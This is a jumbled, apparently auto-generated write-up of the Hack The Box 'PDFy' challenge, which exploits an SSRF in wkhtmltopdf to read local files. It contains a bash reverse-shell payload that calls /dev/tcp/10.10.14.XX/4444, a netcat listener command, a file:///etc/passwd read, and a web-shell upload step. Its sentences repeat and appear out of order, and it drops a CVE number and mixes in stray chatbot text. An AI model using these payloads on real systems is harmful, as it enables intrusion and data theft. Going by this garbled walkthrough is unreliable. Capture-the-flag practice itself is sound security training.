Official PDFy Discussion - Challenges - Hack The Box :: Forums
Upon navigating to the target IP address and port in your browser, you are met with a clean, minimalist web utility. The primary interface features a single input box requesting a URL. 1. Basic Functionality Test
With the exact software and version identified ( wkhtmltopdf 0.12.5 ), the next step is to search for any known vulnerabilities. This specific version is vulnerable to a high-severity SSRF flaw, officially tracked as .
<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>"> pdfy htb writeup upd
The challenge presents a web application designed to take a user-supplied URL and convert that web page into a downloadable PDF document. By understanding how the backend PDF rendering engine processes redirects, you can bypass local restrictions to read sensitive system files and capture the flag.
The PDFy interface lets users input a website address. The application visits the URL, takes a screenshot, and serves it back inside a dynamically generated PDF document. Web Exploitation Difficulty Rating Primary Vulnerability Server-Side Request Forgery (SSRF) Secondary Impact Local File Inclusion (LFI) via redirection Target Binary Underlying wkhtmltopdf Phase 1: Reconnaissance & Enumeration Step 1: Analyze the Front-End Interaction
Since the server fetches and renders the URL, you can use the file:// protocol to point it toward internal system files. Official PDFy Discussion - Challenges - Hack The
User-controlled input should never be passed directly to backend rendering engines or system commands without rigorous sanitization and validation.
cat /home/robert/user.txt
: Before triggering the payload, we set up a listener on our local machine (e.g., using nc -lvnp 4444 ) to catch the incoming connection. Basic Functionality Test With the exact software and
If you try to directly input a local file path using the file protocol (e.g., file:///etc/passwd ), the application will typically have a blacklist filter in place to block it. 3. Exploiting the SSRF (Bypassing the Filter)
Create a file named index.html in the root of your local web server's directory.
Open or view the generated PDF file through the web browser or download it locally. The document should now display the contents of the machine's local configuration files.
To achieve RCE, we need to upload a web shell. We can do this by using the LFI to find a way to write to a PHP file, or more directly, exploiting the underlying PDF converter.
I can provide more information on how to defend against these vulnerabilities if you specify your needs:
